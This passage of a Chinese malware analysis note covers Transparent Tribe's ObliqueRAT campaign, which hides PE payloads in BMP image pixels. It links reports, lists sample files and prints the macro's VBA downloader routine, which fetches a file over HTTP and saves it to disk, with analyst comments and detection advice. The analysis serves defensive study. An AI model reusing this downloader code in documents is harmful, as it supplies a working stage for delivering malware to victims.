透明部落通过BMP的RGB通道隐藏PE数据
-
- 报告和样本
-
- [《Transparent Tribe APT expands its Windows malware arsenal》](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)
- [《ObliqueRAT returns with new campaign using hijacked websites》](https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html)
- [《ObliqueRAT: New RAT hits victims' endpoints via malicious documents》](https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html)
- 样本
- 知识扩展图片隐写
报告和样本
《Transparent Tribe APT expands its Windows malware arsenal》
没什么技术分析,主要是描述战术和趋势
《ObliqueRAT returns with new campaign using hijacked websites》
有描述宏代码,以及RAT的更新
《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》
内容为ObliqueRAT分析,也可以看看
样本
theta.bmp
camela.bmp
merj.bmp
宏代码
DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)
' Download the image.
' Analyst note: this is the downloader stage of the macro. It performs a
' synchronous HTTP GET of `url` through the late-bound Microsoft.XMLHTTP
' object and, on HTTP 200, writes the raw response body to `filePath` via an
' ADODB.Stream. Per the reports above, the fetched file is a BMP whose RGB
' channel data carries the PE payload; this routine itself only fetches and
' saves bytes, the decoding happens elsewhere in the macro.
'   url      - address of the resource to fetch (supplied by the calling macro).
'   filePath - local path the response body is written to.
' Detection angle: an Office process instantiating Microsoft.XMLHTTP and
' ADODB.Stream from VBA and then writing a file to disk is a classic
' downloader pattern worth alerting on (AMSI script logging, Office macro
' telemetry, child-process / file-write monitoring on Office hosts).
Sub DownloadBackground(url As String, filePath As String)
Dim WinHttpReq As Object, attempts As Integer
attempts = 4
' Any runtime error jumps back to TryAgain; attempts is decremented on every
' pass through the label (including the first fall-through), so the body runs
' with attempts = 3, 2, 1 - at most three tries, not four.
' NOTE(review): VBA normally does not re-trap an error raised while a handler
' is already active (no Resume is used here), so a second failure likely
' propagates to the caller instead of looping - confirm in a sandbox.
On Error GoTo TryAgain
TryAgain:
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
' Third argument False = synchronous request; the macro blocks until it completes.
WinHttpReq.Open \"GET\", url, False
WinHttpReq.send
' Only a 200 response is saved. Any other status is silently ignored and is
' NOT retried - the retry path is reached only through a runtime error.
If WinHttpReq.Status = 200 Then
' Themeream is never declared (no Option Explicit visible), so it is an
' implicit Variant holding the late-bound stream object.
Set Themeream = CreateObject(\"ADODB.Stream\")
Themeream.Open
' Type = 1 is adTypeBinary: the body is written as raw bytes, not text.
Themeream.Type = 1
Themeream.Write WinHttpReq.responseBody
' Second argument 1 is adSaveCreateNotExist: creates filePath but does not
' overwrite an existing file (an existing file raises an error instead).
Themeream.SaveToFile filePath, 1
Themeream.Close
End If
End If
End Sub
'PE文件大小
Private Func